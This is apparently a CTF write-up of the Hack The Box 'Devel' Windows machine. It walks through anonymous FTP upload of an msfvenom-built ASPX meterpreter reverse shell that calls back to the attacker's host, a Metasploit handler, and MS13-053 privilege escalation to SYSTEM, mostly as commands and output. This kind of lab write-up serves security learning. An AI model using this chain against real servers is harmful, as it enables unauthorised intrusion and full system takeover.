---
title: "Hackthebox: devel"
date: 2020-12-06T22:58:29+01:00
url:
author: /me
categories: ['writeup']
tags: ['ctf', 'hacking', 'htb']
summary: 
draft: false
---

Walkthrough a new easy Windows box.

<!--more-->

Let's start with a scan:

```shell
nmap -T4 -A -v 10.10.10.5
 
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
```

Quick findings:

- IIS 7.5 has exploitable bugs
- anonymous ftp will allow us to upload files

Checking file upload...

```shell
root@kali:~# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put hello.htm
local: hello.htm remote: hello.htm
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
57 bytes sent in 0.00 secs (1.6473 MB/s)
ftp>
```

Hint: generate an ASP.NET payload with msfvenom

```shell
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=1234 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2800 bytes
```

Now:

- Upload our reverse shell to the IIS server
- Start listening in our local host
- Run remote shell.aspx by just visiting the site https://10.10.10.5/shell.aspx

First step is trivial.

Second step:

```shell
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.15
LHOST => 10.10.14.15
msf5 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf5 exploit(multi/handler) > run
```

Go to the web server and run our payload. We'll notice:

```shell
[*] Started reverse TCP handler on 10.10.14.15:1234
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.15:1234 -> 10.10.10.5:49158) at 2020-06-22 13:24:15 -0400
 
meterpreter > pwd
c:\windows\system32\inetsrv
 
meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > shell
Process 1960 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web
```

Ok, turns out the we are "web" and do not already have the required privileges.

We can try the usual easy way:

```shell
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
```

Did not work :smile: 

Ok, let's use the suggester module. We need to let our meterpreter session to run in background:

```shell
meterpreter > background
[*] Backgrounding session 3...
msf5 exploit(multi/handler) > search suggester
 
Matching Modules
================
 
   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester
 
 
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > show options
 
Module options (post/multi/recon/local_exploit_suggester):
 
   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits
 
msf5 post(multi/recon/local_exploit_suggester) > set session 3
session => 3
msf5 post(multi/recon/local_exploit_suggester) > run
 
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 30 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
...
```

So we can start trying all of them...

I was lucky with MS13-053:

```shell
msf5 exploit(windows/local/ms10_092_schelevator) > use exploit/windows/local/ms13_053_schlamperei

msf5 exploit(windows/local/ms13_053_schlamperei) > show options

Module options (exploit/windows/local/ms13_053_schlamperei):

Name Current Setting Required Description
 ---- --------------- -------- -----------
 SESSION yes The session to run this module on.

Exploit target:

Id Name
 -- ----
 0 Windows 7 SP0/SP1


msf5 exploit(windows/local/ms13_053_schlamperei) > set session 3
session => 3
msf5 exploit(windows/local/ms13_053_schlamperei) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] Launching notepad to host the exploit...
[+] Process 2504 launched.
[*] Reflectively injecting the exploit DLL into 2504...
[*] Injecting exploit into 2504...
[*] Found winlogon.exe with PID 444
[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell
[*] Exploit completed, but no session was created.
```

Ok, `winlogon.exe` was found. A dll should have been injected and we can migrate to that process:

```shell
msf5 exploit(windows/local/ms13_053_schlamperei) > sessions 3
[*] Starting interaction with 3...

meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
 --- ---- ---- ---- ------- ---- ----
 0 0 [System Process] 
 4 0 System 
 264 4 smss.exe 
 344 336 csrss.exe 
 384 336 wininit.exe 
 396 376 csrss.exe 
 444 376 winlogon.exe x86 1 C:\Windows\system32\winlogon.exe
 488 384 services.exe 
 500 384 lsass.exe 
 508 384 lsm.exe 
 608 488 svchost.exe 
 672 488 svchost.exe 
 724 488 svchost.exe 
 800 488 svchost.exe 
 808 444 LogonUI.exe 
 888 488 svchost.exe 
 984 488 svchost.exe 
 1064 488 svchost.exe 
 1176 488 spoolsv.exe 
 1212 488 svchost.exe 
 1300 488 svchost.exe 
 1364 488 svchost.exe 
 1416 488 svchost.exe 
 1444 488 msdtc.exe 
 1504 488 VGAuthService.exe 
 1532 488 vmtoolsd.exe 
 1564 488 svchost.exe 
 1892 488 TrustedInstaller.exe 
 2032 608 WmiPrvSE.exe 
 2796 488 sppsvc.exe 
 2836 488 svchost.exe 
 2936 488 SearchIndexer.exe 
 3860 1564 w3wp.exe x86 0 IIS APPPOOL\Web c:\windows\system32\inetsrv\w3wp.exe

meterpreter > migrate 444
[*] Migrating from 3860 to 444...
[*] Migration completed successfully.
meterpreter > shell
Process 1860 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
```

We are **SYSTEM** now, so we just have to find the `user.txt` and `root.txt` files with the flags.